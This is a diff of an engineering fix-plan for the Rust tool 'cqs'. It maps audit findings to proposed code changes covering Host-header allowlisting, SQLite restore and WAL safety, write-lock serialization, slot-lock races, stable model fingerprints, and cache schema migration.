+            return Err((StatusCode::BAD_REQUEST, "missing Host header"));
+        }
+    };
+    if allowed.contains(host) {
+        Ok(next.run(req).await)
     } else {
-        println!("Project '{}' not found", name);
+        tracing::warn!(host = %host, "serve: rejected request with disallowed Host header");
+        Err((StatusCode::BAD_REQUEST, "disallowed Host header"))
     }
+}
+```
+
+### Notes
+
+Existing `src/serve/tests.rs` fixtures via `Request::builder()` need `.header(HOST, "127.0.0.1:8080")` added. P1.12 covers the same bypass at higher priority — confirm this finding hasn't been swept into that fix already; if so, mark resolved.
+
+---
+
+## P2.58 — --bind 0.0.0.0 host-allowlist breaks LAN
+
+**Finding:** P2.58 in audit-triage.md
+**Files:** `src/serve/mod.rs:207-218`
+**Why:** Wildcard bind populates allowlist with `{loopback, 0.0.0.0, 0.0.0.0:port}` only. LAN clients sending `Host: 192.168.1.5:8080` get 400, push operators to `--no-auth`.
+
+### Current code
+
+`src/serve/mod.rs:207-218`:
+
+```rust
+pub(crate) fn allowed_host_set(bind_addr: &SocketAddr) -> AllowedHosts {
+    let port = bind_addr.port();
+    let mut set = HashSet::new();
+    for host in ["localhost", "127.0.0.1", "[::1]"] {
+        set.insert(host.to_string());
+        set.insert(format!("{host}:{port}"));
+    }
+    // SocketAddr::to_string wraps IPv6 in brackets automatically.
+    set.insert(bind_addr.to_string());
+    set.insert(bind_addr.ip().to_string());
+    Arc::new(set)
+}
+```
+
+### Replacement
+
+```rust
+pub(crate) fn allowed_host_set(bind_addr: &SocketAddr) -> AllowedHosts {
+    let port = bind_addr.port();
+    let mut set = HashSet::new();
+    for host in ["localhost", "127.0.0.1", "[::1]"] {
+        set.insert(host.to_string());
+        set.insert(format!("{host}:{port}"));
+    }
+    set.insert(bind_addr.to_string());
+    set.insert(bind_addr.ip().to_string());
+
+    // SEC-V1.30: when binding to a wildcard, we have no way to know which
+    // interface IP a legitimate LAN client will dial. Enumerate all local
+    // interfaces and add their IPs (plus `:port`) to the allowlist so
+    // teammate browsers on the same VLAN don't get 400'd into `--no-auth`.
+    if bind_addr.ip().is_unspecified() {
+        if let Ok(addrs) = if_addrs::get_if_addrs() {
+            for ifa in addrs {
+                let ip = ifa.ip().to_string();
+                set.insert(ip.clone());
+                set.insert(format!("{ip}:{port}"));
+            }
+        } else {
+            tracing::warn!(
+                "wildcard bind: failed to enumerate interfaces; LAN clients may hit \
+                 disallowed-Host 400. Use an explicit --bind <ip> if this is a problem."
+            );
+        }
+    }
+    Arc::new(set)
+}
+```
+
+### Notes
+
+Adds `if_addrs` workspace dep — confirm via `Cargo.toml` whether it's already pulled in transitively (`notify` may already use it). If a new dep is unwanted, the alternative is to skip the host-header check entirely when `bind.is_unspecified()` and emit a one-line stderr at startup. State the trade-off in the verifier's PR.
+
+---
+
+## P2.59 — Migration restore_from_backup overwrites live DB while pool open
+
+**Finding:** P2.59 in audit-triage.md
+**Files:** `src/store/backup.rs:171-180`, `src/store/migrations.rs:106-128`
+**Why:** Atomic-replace over `db_path` while the SQLite pool from `migrate()`'s caller still holds open file descriptors. Pool sees old (unlinked) inode; new processes see restored DB. Two-state divergence in daemon contexts.
+
+### Current code
+
+`src/store/backup.rs:171-180`:
+
+```rust
+pub(crate) fn restore_from_backup(db_path: &Path, backup_db: &Path) -> Result<(), StoreError> {
+    let _span = tracing::info_span!("restore_from_backup").entered();
+    copy_triplet(backup_db, db_path)?;
+    tracing::info!(
+        db = %db_path.display(),
+        backup = %backup_db.display(),
+        "Restored DB from backup after migration failure"
+    );
     Ok(())
 }
 ```
 
-**Why**: `cqs --json project list` emits colored ANSI text; agents consuming JSON crash.
+### Replacement
 
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --test cli_envelope_test -- project`.
-
----
-
-### API-V1.29-2: `ref add/remove/update` ignore `--json`
-
-**File**: `/mnt/c/Projects/cqs/src/cli/commands/infra/reference.rs`
-
-**Current code** (lines 42-69 — `RefCommand` variants — and handlers at 88-185, 234-end):
-```rust
-Add {
-    name: String,
-    source: PathBuf,
-    #[arg(long, default_value = "0.8", value_parser = crate::cli::definitions::parse_finite_f32)]
-    weight: f32,
-},
-// List has output: TextJsonArgs — the others don't.
-Remove { name: String },
-Update { name: String },
-```
-
-**Fix**:
-
-Add `output: TextJsonArgs` to `Add`, `Remove`, `Update`. Handle JSON branch in each handler by emitting `{name, action, result}`:
+Change the contract: `restore_from_backup` requires the caller to drop the pool first. Update the caller in `src/store/migrations.rs:106-128` to drop pool before calling.
 
 ```rust
-Add {
-    name: String,
-    source: PathBuf,
-    #[arg(long, default_value = "0.8", value_parser = crate::cli::definitions::parse_unit_f32)]
-    weight: f32,
-    #[command(flatten)]
-    output: TextJsonArgs,
-},
-Remove {
-    name: String,
-    #[command(flatten)]
-    output: TextJsonArgs,
-},
-Update {
-    name: String,
-    #[command(flatten)]
-    output: TextJsonArgs,
-},
-```
-
-Thread `cli.json || output.json` through `cmd_ref_add` / `cmd_ref_remove` / `cmd_ref_update`, then swap `println!` blocks to `emit_json(&serde_json::json!({"name": name, "action": "added", "chunks": stats.total_embedded}))` style envelopes.
-
-**Why**: Same class as API-V1.29-1 — `cqs --json ref add` emits text, crashes downstream parsers.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --test cli_envelope_test -- ref`.
-
----
-
-### API-V1.29-4: `notes list --check` dropped by daemon
-
-**File**: `/mnt/c/Projects/cqs/src/cli/args.rs` + `src/cli/batch/handlers/misc.rs`
-
-**Current code** (args.rs:532-540):
-```rust
-#[derive(Args, Debug, Clone)]
-pub(crate) struct NotesListArgs {
-    /// Show only warnings (negative sentiment)
-    #[arg(long)]
-    pub warnings: bool,
-    /// Show only patterns (positive sentiment)
-    #[arg(long)]
-    pub patterns: bool,
+/// Restore a DB file (+ WAL/SHM sidecars) from a backup.
+///
+/// # Safety
+/// Caller MUST close every pool open against `db_path` BEFORE calling. SQLite
+/// in-process pools hold file descriptors against the old inode that the
+/// atomic replace unlinks; queries through those descriptors after restore
+/// see the unlinked-old inode while new processes see the backup. Two-state
+/// divergence is silent — the WAL/SHM sidecars copied alongside the main DB
+/// land on the new inode while the pool's mmap'd sidecars belong to the old.
+///
+/// Public API note: callers that re-open a pool after restore must reopen
+/// fresh; the in-process Store handle held during migration is invalid.
+pub(crate) fn restore_from_backup(db_path: &Path, backup_db: &Path) -> Result<(), StoreError> {
+    let _span = tracing::info_span!("restore_from_backup").entered();
+    copy_triplet(backup_db, db_path)?;
+    tracing::info!(
+        db = %db_path.display(),
+        backup = %backup_db.display(),
+        "Restored DB from backup after migration failure"
+    );
+    Ok(())
 }
 ```
 
-(`NotesCommand::List` at notes.rs:51-64 has an extra `check: bool` field.)
+And in `src/store/migrations.rs:106-128`, hoist the pool close before the restore call. Use `pool.close().await` (via the existing `rt.block_on`) on every pool the migration owns.
 
-**Fix**:
+### Notes
 
-Add `check: bool` to `NotesListArgs` so daemon dispatch receives the same flag as CLI:
+Verifier needs to read `migrations.rs:106-128` to identify the actual pool ownership. The minimal fix is correct documentation + caller-side `pool.close().await`. Add `PRAGMA wal_checkpoint(TRUNCATE)` against the live DB before restore to ensure WAL is drained.
+
+---
+
+## P2.60 — stream_summary_writer bypasses WRITE_LOCK
+
+**Finding:** P2.60 in audit-triage.md
+**Files:** `src/store/chunks/crud.rs:504-545`
+**Why:** Streamed `INSERT OR IGNORE` from LLM provider threads runs against the SqlitePool directly, no WRITE_LOCK. Concurrent reindex contends for SQLite's exclusive lock; per-row implicit transactions are 1 fsync per row.
+
+### Current code
+
+`src/store/chunks/crud.rs:504-540`:
 
 ```rust
-#[derive(Args, Debug, Clone)]
-pub(crate) struct NotesListArgs {
-    #[arg(long)]
-    pub warnings: bool,
-    #[arg(long)]
-    pub patterns: bool,
-    /// Check mentions for staleness (verifies files exist and symbols are in index)
-    #[arg(long)]
-    pub check: bool,
+    pub fn stream_summary_writer(
+        &self,
+        model: String,
+        purpose: String,
+    ) -> crate::llm::provider::OnItemCallback {
+        use std::sync::Arc;
+        let pool = self.pool.clone();
+        let rt = Arc::clone(&self.rt);
+        Box::new(move |custom_id: &str, text: &str| {
+            let now = chrono::Utc::now().to_rfc3339();
+            let pool = pool.clone();
+            let model = model.clone();
+            let purpose = purpose.clone();
+            let custom_id = custom_id.to_string();
+            let text = text.to_string();
+            let result = rt.block_on(async move {
+                sqlx::query(
+                    "INSERT OR IGNORE INTO llm_summaries \
+                     (content_hash, summary, model, purpose, created_at) \
+                     VALUES (?, ?, ?, ?, ?)",
+                )
+                .bind(&custom_id)
+                .bind(&text)
+                .bind(&model)
+                .bind(&purpose)
+                .bind(&now)
+                .execute(&pool)
+                .await
+            });
+            if let Err(e) = result { /* ... */ }
+        })
+    }
+```
+
+### Replacement
+
+Move the streamed inserts through a buffered queue drained under `begin_write()`. Spawn a single drain task that reads from a `Mutex<Vec<(custom_id, text)>>` flushed every ~200ms or when 64 entries accumulate.
+
+```rust
+    pub fn stream_summary_writer(
+        &self,
+        model: String,
+        purpose: String,
+    ) -> crate::llm::provider::OnItemCallback {
+        use std::sync::Arc;
+        // Buffered queue: streamed callbacks push into this Vec; a drain
+        // task flushes under begin_write() so all writes serialize through
+        // WRITE_LOCK like every other Store mutation. The mutex is local to
+        // this writer instance — concurrent stream_summary_writer calls get
+        // their own queues.
+        let queue: Arc<std::sync::Mutex<Vec<(String, String)>>> =
+            Arc::new(std::sync::Mutex::new(Vec::new()));
+        let rt = Arc::clone(&self.rt);
+        let pool = self.pool.clone();
+        let write_lock = self.write_lock(); // assuming a getter for WRITE_LOCK Arc<Mutex<()>>
+        let queue_drain = Arc::clone(&queue);
+        let model_drain = model.clone();
+        let purpose_drain = purpose.clone();
+
+        // Spawn drain thread; flushes at most every 200ms or when 64 items
+        // queued. Exits when queue is dropped (Arc strong_count reaches 1).
+        rt.spawn(async move {
+            loop {
+                tokio::time::sleep(std::time::Duration::from_millis(200)).await;
+                let drained: Vec<(String, String)> = {
+                    let mut q = queue_drain.lock().unwrap_or_else(|p| p.into_inner());
+                    if q.is_empty() {
+                        if Arc::strong_count(&queue_drain) == 1 { break; }
+                        continue;
+                    }
+                    std::mem::take(&mut *q)
+                };
+                let _g = write_lock.lock().await;
+                let now = chrono::Utc::now().to_rfc3339();
+                let mut tx = match pool.begin().await {
+                    Ok(t) => t,
+                    Err(e) => {
+                        tracing::warn!(error = %e, "stream_summary_writer drain begin failed");
+                        continue;
+                    }
+                };
+                for (custom_id, text) in drained {
+                    let _ = sqlx::query(
+                        "INSERT OR IGNORE INTO llm_summaries \
+                         (content_hash, summary, model, purpose, created_at) \
+                         VALUES (?, ?, ?, ?, ?)",
+                    )
+                    .bind(&custom_id)
+                    .bind(&text)
+                    .bind(&model_drain)
+                    .bind(&purpose_drain)
+                    .bind(&now)
+                    .execute(&mut *tx)
+                    .await;
+                }
+                let _ = tx.commit().await;
+            }
+        });
+
+        Box::new(move |custom_id: &str, text: &str| {
+            let mut q = queue.lock().unwrap_or_else(|p| p.into_inner());
+            q.push((custom_id.to_string(), text.to_string()));
+        })
+    }
+```
+
+### Notes
+
+Requires exposing `WRITE_LOCK` accessor on `Store`. If not present, expose via `pub(crate) fn write_lock(&self) -> Arc<...>`. Verifier must check the lock implementation (sync `std::sync::Mutex` vs Tokio `Mutex`) and adjust accordingly. The above is a sketch — actual impl needs to match `begin_write()` signatures.
+
+If a full async drain is too invasive, an interim fix is to acquire WRITE_LOCK inside the callback before each insert (still per-row, but properly serialized). That's a smaller diff.
+
+---
+
+## P2.61 — slot_remove TOCTOU on concurrent promote
+
+**Finding:** P2.61 in audit-triage.md
+**Files:** `src/cli/commands/infra/slot.rs:299-350`
+**Why:** Read active_slot → list_slots → remove_dir_all is non-atomic; concurrent promote can change active between steps, leaving system pointing at deleted slot.
+
+### Current code
+
+`src/cli/commands/infra/slot.rs:299-350` (excerpted):
+
+```rust
+fn slot_remove(project_cqs_dir: &Path, name: &str, force: bool, json: bool) -> Result<()> {
+    let _span = tracing::info_span!("slot_remove", name, force).entered();
+    validate_slot_name(name)?;
+    let dir = slot_dir(project_cqs_dir, name);
+    if !dir.exists() {
+        let available = list_slots(project_cqs_dir).unwrap_or_default().join(", ");
+        anyhow::bail!(/*...*/);
+    }
+    let active = read_active_slot(project_cqs_dir).unwrap_or_else(|| DEFAULT_SLOT.to_string());
+    let mut all = list_slots(project_cqs_dir).unwrap_or_default();
+    all.retain(|n| n != name);
+    if name == active { /*...*/ }
+    fs::remove_dir_all(&dir)?;
+    /*...*/
 }
 ```
 
-Update `dispatch_notes` (batch/handlers/misc.rs:85-118) signature to accept `check: bool`, pass through to a new `staleness_check` code path that mirrors `cmd_notes_list`'s check logic. If the stale-check impl isn't trivially shareable, initially route: when `check` is true, load notes + run the existing `stale_mentions()` helper from `cmd_notes`, emit those in the output.
+### Replacement
 
-Also update the parent dispatcher call site in `src/cli/batch/mod.rs` (match arm for `BatchCmd::Notes(NotesListArgs { warnings, patterns, check })`) to pass `check` through.
-
-**Why**: Both EX-V1.29-5 and API-V1.29-4 — drift between CLI and daemon arg structs causes `cqs notes list --check` via daemon to silently drop the check.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --test cli_notes_test -- check`.
-
----
-
-### EH-V1.29-1: `build_brief_data` swallows 3 errors
-
-**File**: `/mnt/c/Projects/cqs/src/cli/commands/io/brief.rs`
-
-**Current code** (lines 59-75):
-```rust
-let caller_counts = store.get_caller_counts_batch(&names).unwrap_or_else(|e| {
-    tracing::warn!(error = %e, "Failed to fetch caller counts");
-    HashMap::new()
-});
-
-let graph = store.get_call_graph().unwrap_or_else(|e| {
-    tracing::warn!(error = %e, "Failed to load call graph for test counts");
-    std::sync::Arc::new(cqs::store::CallGraph::from_string_maps(
-        std::collections::HashMap::new(),
-        std::collections::HashMap::new(),
-    ))
-});
-let test_chunks = store.find_test_chunks().unwrap_or_else(|e| {
-    tracing::warn!(error = %e, "Failed to find test chunks");
-    std::sync::Arc::new(Vec::new())
-});
-```
-
-**Fix**:
-
-Either propagate the errors, or thread them into a `warnings: Vec<String>` field on `BriefData` + the output JSON so the consumer sees that the brief is partially-populated. The propagate approach is simpler:
+Wrap the entire read-validate-mutate sequence in an exclusive lock on `.cqs/slots.lock`, mirroring `notes.toml.lock`:
 
 ```rust
-let caller_counts = store
-    .get_caller_counts_batch(&names)
-    .context("Failed to fetch caller counts for brief")?;
-let graph = store
-    .get_call_graph()
-    .context("Failed to load call graph for brief")?;
-let test_chunks = store
-    .find_test_chunks()
-    .context("Failed to find test chunks for brief")?;
-```
+fn slot_remove(project_cqs_dir: &Path, name: &str, force: bool, json: bool) -> Result<()> {
+    let _span = tracing::info_span!("slot_remove", name, force).entered();
+    validate_slot_name(name)?;
 
-Remove the default-empty fallbacks. If the user wants a best-effort partial brief, that should be a separate subcommand mode; the current silent zero-fill is strictly worse than a loud failure.
+    // Take an exclusive lock so concurrent slot_promote / slot_create /
+    // slot_remove can't race the read-validate-mutate sequence below.
+    let _slots_lock = cqs::slot::acquire_slots_lock(project_cqs_dir)?;
 
-**Why**: On store corruption / permission denied, `cqs brief foo.rs` returns "0 callers, 0 tests" with zero indication that the data is fake.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --test cli_brief_test`.
-
----
-
-### EH-V1.29-2: `run_ci_analysis` silently downgrades dead-code failure
-
-**File**: `/mnt/c/Projects/cqs/src/ci.rs`
-
-**Current code** (lines 100-128):
-```rust
-let dead_in_diff = match store.find_dead_code(true) {
-    Ok((confident, possibly_pub)) => {
-        // ... build Vec<DeadInDiff> ...
-        dead
-    }
-    Err(e) => {
-        tracing::warn!(error = %e, "Dead code detection failed — CI will report 0 dead code (not 'scan passed')");
-        Vec::new()
-    }
-};
-```
-
-**Fix**:
-
-Add a `dead_code_scan_failed: bool` field to the CI report, populate on error, and let the gate evaluation fail on scan failure unless the user explicitly asks for permissive mode:
-
-```rust
-let (dead_in_diff, dead_code_scan_failed, dead_scan_error) = match store.find_dead_code(true) {
-    Ok((confident, possibly_pub)) => {
-        let dead = /* existing mapping */;
-        (dead, false, None)
-    }
-    Err(e) => {
-        tracing::error!(error = %e, "Dead code detection failed — CI treating as a gate failure");
-        (Vec::new(), true, Some(format!("{e:#}")))
-    }
-};
-
-// In evaluate_gate:
-if dead_code_scan_failed && !allow_scan_failures {
-    reasons.push(format!(
-        "Dead-code scan failed: {}",
-        dead_scan_error.as_deref().unwrap_or("<unknown>")
-    ));
+    let dir = slot_dir(project_cqs_dir, name);
+    // ... rest unchanged
 }
 ```
 
-Wire the `allow_scan_failures` knob through as a `--permissive` CLI flag or `CQS_CI_ALLOW_SCAN_FAILURES=1` env var, default false.
+Add `acquire_slots_lock` helper in `src/slot/mod.rs`:
 
-**Why**: `cqs ci` currently emits "0 dead code, gate passed" when dead-code detection exploded — CI treats broken tooling as a passing build.
+```rust
+/// Acquire an exclusive flock on `.cqs/slots.lock`. Held for the duration of
+/// any slot lifecycle operation (create/promote/remove) so concurrent calls
+/// across processes serialize. Lock file is created if missing.
+pub fn acquire_slots_lock(project_cqs_dir: &Path) -> Result<std::fs::File, SlotError> {
+    fs::create_dir_all(project_cqs_dir).map_err(|source| SlotError::Io {
+        slot: "slots.lock".to_string(),
+        source,
+    })?;
+    let path = project_cqs_dir.join("slots.lock");
+    let f = fs::OpenOptions::new()
+        .create(true)
+        .read(true)
+        .write(true)
+        .open(&path)
+        .map_err(|source| SlotError::Io {
+            slot: "slots.lock".to_string(),
+            source,
+        })?;
+    f.lock().map_err(|source| SlotError::Io {
+        slot: "slots.lock".to_string(),
+        source,
+    })?;
+    Ok(f)
+}
+```
 
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --test ci_test`.
+Apply the same `acquire_slots_lock` at the top of `slot_create` and `slot_promote`.
+
+### Notes
+
+`std::fs::File::lock()` is Rust 1.89+, MSRV 1.95 covers it. Rolls together P2.62 and P2.34 (same TOCTOU class). Add a regression test that spawns two threads, each calls `slot_remove` and `slot_promote` for the same target, asserts no orphaned active_slot pointer.
 
 ---
 
-### EH-V1.29-7: `EmbeddingCache::stats` 5 silent failures
+## P2.62 — Slot legacy migration moves live WAL/SHM
 
-**File**: `/mnt/c/Projects/cqs/src/cache.rs`
+**Finding:** P2.62 in audit-triage.md
+**Files:** `src/slot/mod.rs:511-624`
+**Why:** Migration moves `index.db-wal`/`-shm` without checkpointing first. Cross-device fallback is non-atomic — interrupt mid-copy can leave new index.db without WAL, SQLite then truncates uncommitted pages.
 
-**Current code** (lines 408-461, 5 `unwrap_or_else` chains):
+### Current code
+
+`src/slot/mod.rs:511-545` (start of `migrate_legacy_index_to_default_slot`):
+
 ```rust
-let total_entries: i64 = sqlx::query_scalar("SELECT COUNT(*) FROM embedding_cache")
-    .fetch_one(&self.pool)
-    .await
-    .unwrap_or_else(|e| {
-        tracing::warn!(error = %e, "cache stats: COUNT failed");
-        0
-    });
-// ... 4 more sibling queries with identical unwrap_or_else pattern
+pub fn migrate_legacy_index_to_default_slot(project_cqs_dir: &Path) -> Result<bool, SlotError> {
+    let _span = tracing::info_span!(
+        "migrate_legacy_index_to_default_slot",
+        cqs_dir = %project_cqs_dir.display()
+    )
+    .entered();
+    if !project_cqs_dir.exists() { return Ok(false); }
+    let slots_dir = slots_root(project_cqs_dir);
+    if slots_dir.exists() { return Ok(false); }
+    let legacy_index = project_cqs_dir.join(crate::INDEX_DB_FILENAME);
+    if !legacy_index.exists() { return Ok(false); }
+    let dest = slot_dir(project_cqs_dir, DEFAULT_SLOT);
+    fs::create_dir_all(&dest).map_err(/*...*/)?;
+    let migration_files = collect_migration_files(project_cqs_dir);
+    let mut moved: Vec<(PathBuf, PathBuf)> = Vec::new();
+    for src in &migration_files { /* move_file */ }
+    /* ... */
+}
 ```
 
-**Fix**:
+### Replacement
 
-Propagate via `?` so the caller knows the stats are unreliable. The stats API is read-only; there's no good reason to return a silent-zero when the DB is unhealthy:
+Insert a WAL-checkpoint step before the file moves so WAL is drained into main DB:
 
 ```rust
-pub fn stats(&self) -> Result<CacheStats, CacheError> {
-    let _span = tracing::info_span!("cache_stats").entered();
-    self.rt.block_on(async {
-        let total_entries: i64 = sqlx::query_scalar("SELECT COUNT(*) FROM embedding_cache")
-            .fetch_one(&self.pool)
+pub fn migrate_legacy_index_to_default_slot(project_cqs_dir: &Path) -> Result<bool, SlotError> {
+    let _span = tracing::info_span!(/*...*/).entered();
+    if !project_cqs_dir.exists() { return Ok(false); }
+    let slots_dir = slots_root(project_cqs_dir);
+    if slots_dir.exists() { return Ok(false); }
+    let legacy_index = project_cqs_dir.join(crate::INDEX_DB_FILENAME);
+    if !legacy_index.exists() { return Ok(false); }
+
+    // Drain any uncommitted WAL pages into the main DB before we move files.
+    // Without this, the move shuffles index.db, index.db-wal, and index.db-shm
+    // separately; a non-atomic copy + remove (the EXDEV cross-device fallback
+    // in move_file) can interrupt between index.db and index.db-wal, leaving
+    // the new slots/default/index.db without its WAL — SQLite then opens the
+    // partial DB and silently truncates the missing pages.
+    if let Err(e) = checkpoint_legacy_index(&legacy_index) {
+        // Non-fatal: the moves still proceed atomically on same-fs renames.
+        // On cross-device, the user accepts the remaining risk — log loudly.
+        tracing::warn!(
+            error = %e,
+            "Failed to checkpoint legacy index.db before migration; cross-device move \
+             may lose uncommitted WAL pages"
+        );
+    }
+
+    let dest = slot_dir(project_cqs_dir, DEFAULT_SLOT);
+    fs::create_dir_all(&dest).map_err(/*...*/)?;
+    /* unchanged */
+}
+
+/// Open the legacy DB and run `PRAGMA wal_checkpoint(TRUNCATE)` so the WAL
+/// sidecar is empty before the migration moves files. Closes the connection
+/// after the pragma so file handles don't leak into the move loop.
+fn checkpoint_legacy_index(legacy_index: &Path) -> Result<(), SlotError> {
+    let conn = rusqlite::Connection::open(legacy_index)
+        .map_err(|e| SlotError::Migration(format!("open legacy db: {e}")))?;
+    conn.pragma_update(None, "wal_checkpoint", "TRUNCATE")
+        .map_err(|e| SlotError::Migration(format!("checkpoint: {e}")))?;
+    Ok(())
+}
+```
+
+### Notes
+
+If `rusqlite` isn't a dep here, use `sqlx` via a small `tokio::runtime` block. Verifier should pick whichever matches local conventions. Also see P2.34 (rollback half-state) — same migration, related fix; ideally combined into one PR.
+
+---
+
+## P2.63 — model_fingerprint Unix timestamp fallback
+
+**Finding:** P2.63 in audit-triage.md
+**Files:** `src/embedder/mod.rs:435-465`
+**Why:** Four error branches use `format!("{}:{}", repo, ts)` where ts changes per restart. Cross-slot copy by content_hash is broken; cache writes accumulate as orphans.
+
+### Current code
+
+`src/embedder/mod.rs:435-465` (excerpted):
+
+```rust
+                                Err(e) => {
+                                    tracing::warn!(error = %e, "Failed to stream-hash model, using repo+timestamp fallback");
+                                    let ts = std::time::SystemTime::now()
+                                        .duration_since(std::time::UNIX_EPOCH)
+                                        .unwrap_or_default()
+                                        .as_secs();
+                                    format!("{}:{}", self.model_config.repo, ts)
+                                }
+                            }
+                        }
+                    }
+                }
+                Err(e) => {
+                    tracing::warn!(error = %e, "Failed to open model for fingerprint, using repo+timestamp fallback");
+                    let ts = std::time::SystemTime::now()
+                        .duration_since(std::time::UNIX_EPOCH)
+                        .unwrap_or_default()
+                        .as_secs();
+                    format!("{}:{}", self.model_config.repo, ts)
+                }
+            }
+        }
+        Err(e) => {
+            tracing::warn!(error = %e, "Failed to get model paths for fingerprint, using repo+timestamp fallback");
+            let ts = std::time::SystemTime::now()
+                .duration_since(std::time::UNIX_EPOCH)
+                .unwrap_or_default()
+                .as_secs();
+            format!("{}:{}", self.model_config.repo, ts)
+        }
+```
+
+### Replacement
+
+Replace the three timestamp fallbacks with a stable shape derived from repo + file size (when available) + a `:fallback` discriminator. Prefer file size when readable; fall back to repo only if size is unavailable.
+
+```rust
+/// Stable fallback fingerprint shape — must NOT include any value that
+/// changes across process restarts. Cross-slot embedding cache copy by
+/// content_hash relies on the model fingerprint matching across runs, so a
+/// per-restart timestamp fragments the cache and orphans every fallback
+/// embedding. File size is the lightest stable discriminator we can compute
+/// without re-reading the file; if even size is unavailable we still want a
+/// stable string so multiple fallback runs collide on the same key.
+fn fallback_fingerprint(repo: &str, model_path: Option<&Path>) -> String {
+    let size = model_path
+        .and_then(|p| std::fs::metadata(p).ok())
+        .map(|m| m.len())
+        .unwrap_or(0);
+    format!("{}:fallback:size={}", repo, size)
+}
+```
+
+Then at each of the three error sites:
+
+```rust
+                                Err(e) => {
+                                    tracing::warn!(
+                                        error = %e,
+                                        "Failed to stream-hash model, using stable fallback fingerprint"
+                                    );
+                                    fallback_fingerprint(&self.model_config.repo, Some(&model_path))
+                                }
+```
+
+```rust
+                Err(e) => {
+                    tracing::warn!(
+                        error = %e,
+                        "Failed to open model for fingerprint, using stable fallback fingerprint"
+                    );
+                    fallback_fingerprint(&self.model_config.repo, Some(&model_path))
+                }
+```
+
+```rust
+        Err(e) => {
+            tracing::warn!(
+                error = %e,
+                "Failed to get model paths for fingerprint, using stable fallback fingerprint"
+            );
+            fallback_fingerprint(&self.model_config.repo, None)
+        }
+```
+
+### Notes
+
+Verifier must read the surrounding context to thread the actual `model_path` binding into the first two arms (the path is in scope at the inner Err arm because the outer match opened the file). P1.8 covers the same fingerprint failure as a separate finding — confirm both fixes converge to the same `fallback_fingerprint` helper.
+
+---
+
+## P2.64 — Daemon serializes ALL queries through one Mutex
+
+**Finding:** P2.64 in audit-triage.md
+**Files:** `src/cli/watch.rs:1775-1858`
+**Why:** `Arc<Mutex<BatchContext>>` wraps the entire dispatch path. Slow query (LLM batch fetch, large gather) blocks every other reader. Deadlock surface with stream_summary_writer.
+
+### Current code
+
+`src/cli/watch.rs:1775`:
+
+```rust
+                let ctx = Arc::new(Mutex::new(ctx));
+```
+
+`src/cli/watch.rs:1853-1858`:
+
+```rust
+                            if let Err(e) = std::thread::Builder::new()
+                                .name("cqs-daemon-client".to_string())
+                                .spawn(move || {
+                                    handle_socket_client(stream, &ctx_clone);
+                                    in_flight_clone.fetch_sub(1, Ordering::AcqRel);
+                                })
+```
+
+### Replacement
+
+Convert the outer `Mutex<BatchContext>` to `RwLock<BatchContext>` — read-heavy paths (search, callers, stats) take `read()`; mutation paths (sweep_idle_sessions, reload notes, set_pending_*) take `write()`.
+
+```rust
+                let ctx = Arc::new(std::sync::RwLock::new(ctx));
+```
+
+Then inside `handle_socket_client` (and the periodic sweep), pick the right lock kind. The sweep at `:1807-1812` becomes:
+
+```rust
+                    if last_idle_sweep.elapsed() >= idle_sweep_interval {
+                        if let Ok(mut ctx_guard) = ctx.try_write() {
+                            ctx_guard.sweep_idle_sessions();
+                        }
+                        last_idle_sweep = std::time::Instant::now();
+                    }
+```
+
+Inside `handle_socket_client`, `ctx.read()` for read-only dispatch, `ctx.write()` for mutators. This requires walking the dispatch table to classify each command.
+
+### Notes
+
+This is a non-trivial refactor — the verifier should treat it as a focused PR, not a sweep. Alternative phase 1: keep `Mutex` but split BatchContext into per-resource mutexes (sessions, notes cache, embedder). The audit names both options; pick based on remaining work pressure. State this trade-off explicitly in the PR description.
+
+If RwLock pivot is chosen, audit `stream_summary_writer` (P2.60) — its callbacks fire from outside the daemon thread, must NOT live inside the RwLock guard.
+
+---
+
+## P2.65 — embedding_cache schema purpose conflation
+
+**Finding:** P2.65 in audit-triage.md
+**Files:** `src/cache.rs:159-171`
+**Why:** Cache PRIMARY KEY is `(content_hash, model_fingerprint)` — no `purpose` column distinguishing `embedding` vs `embedding_base`. Lookups can return wrong vector after #1040 enrichment overwrites only `embedding`.
+
+### Current code
+
+`src/cache.rs:159-178`:
+
+```rust
+            sqlx::query(
+                "CREATE TABLE IF NOT EXISTS embedding_cache (
+                    content_hash TEXT NOT NULL,
+                    model_fingerprint TEXT NOT NULL,
+                    embedding BLOB NOT NULL,
+                    dim INTEGER NOT NULL,
+                    created_at INTEGER NOT NULL,
+                    PRIMARY KEY (content_hash, model_fingerprint)
+                )",
+            )
+```
+
+### Replacement
+
+Schema migration: add `purpose` column (default `'embedding'`), include in PK. New rows MUST set purpose; old rows take the default.
+
+```rust
+            sqlx::query(
+                "CREATE TABLE IF NOT EXISTS embedding_cache (
+                    content_hash TEXT NOT NULL,
+                    model_fingerprint TEXT NOT NULL,
+                    purpose TEXT NOT NULL DEFAULT 'embedding',
+                    embedding BLOB NOT NULL,
+                    dim INTEGER NOT NULL,
+                    created_at INTEGER NOT NULL,
+                    PRIMARY KEY (content_hash, model_fingerprint, purpose)
+                )",
+            )
+            .execute(&pool)
             .await?;
-        let total_size: i64 = sqlx::query_scalar(
-            "SELECT page_count * page_size FROM pragma_page_count(), pragma_page_size()",
-        )
-        .fetch_one(&self.pool)
-        .await?;
-        let unique_models: i64 = sqlx::query_scalar(
-            "SELECT COUNT(DISTINCT model_fingerprint) FROM embedding_cache",
-        )
-        .fetch_one(&self.pool)
-        .await?;
-        let oldest: Option<i64> = sqlx::query_scalar("SELECT MIN(created_at) FROM embedding_cache")
-            .fetch_one(&self.pool)
-            .await?;
-        let newest: Option<i64> = sqlx::query_scalar("SELECT MAX(created_at) FROM embedding_cache")
-            .fetch_one(&self.pool)
-            .await?;
-        Ok(CacheStats {
-            total_entries: total_entries as u64,
-            total_size_bytes: total_size as u64,
-            unique_models: unique_models as u64,
-            oldest_timestamp: oldest,
-            newest_timestamp: newest,
+
+            // Idempotent migration for existing caches: ALTER TABLE if the
+            // column doesn't exist. SQLite ignores the ADD COLUMN if the
+            // table is fresh (the CREATE above already includes purpose).
+            sqlx::query(
+                "ALTER TABLE embedding_cache ADD COLUMN purpose TEXT NOT NULL DEFAULT 'embedding'"
+            )
+            .execute(&pool)
+            .await
+            .ok(); // ignore "duplicate column" error on already-migrated caches
+```
+
